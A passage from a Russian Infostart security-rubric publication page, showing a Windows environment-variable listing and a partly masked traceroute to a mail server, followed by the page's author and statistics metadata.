LOGONSERVER=\\ADMIN-ПК
MERCFPRTVCL10=C:\Program Files (x86)\Incotex\MercuryFPrt\1.9.1.1\MercFPrtVCL
MOZ_PLUGIN_PATH=C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Program Files (x86)\NetSarang\Xshell 6\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\PuTTY\
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 42 Stepping 7, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=2a07
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\Admin\AppData\Local\Temp
TMP=C:\Users\Admin\AppData\Local\Temp
USERDOMAIN=Admin-ПК
USERNAME=Admin
USERPROFILE=C:\Users\Admin
windir=C:\Windows
windows_tracing_flags=3
windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log

Трассировка маршрута к mail.ХХХХХХХХХ.ru [92.255.ХХХ.ХХХ]
с максимальным числом прыжков 3:
 //я свой адрес скрыл от общего обозрения. 

  1    <1 мс    <1 мс    <1 мс  192.168.1.100 
  2     1 ms     1 ms     1 ms  172.21.ХХХ.ХХХ 
  3     1 ms     1 ms     1 ms  92.255.ХХХ.ХХХ
 //я его адрес скрыл от общего обозрения. 

Трассировка завершена.

Показать

Оставьте свое сообщение

E-mail:

Автор:

Дмитрий Маевский (dima_home)

Рейтинг: 253

Для получения уведомлений о новых публикациях автора подключите телеграм бот: Инфостарт бот

Публикация:

№ 794076

Создание 03.03.18 09:41

Обновление 03.03.18 09:41

Статистика:

Просмотры 17330

Загрузки 0

Рейтинг 27

Комментарии 81

Характеристики:

Код открыт Да

Рубрики Информационная безопасность

Кому Системный администратор

Тип файла Нет файла

Платформа Платформа 1С v8.3

Конфигурация Конфигурации 1cv8

Операционная система Windows

Страна Не имеет значения

Отрасль Не имеет значения

Налоги Не имеет значения

Вид учета Не имеет значения

Доступ к файлу Бесплатно (free)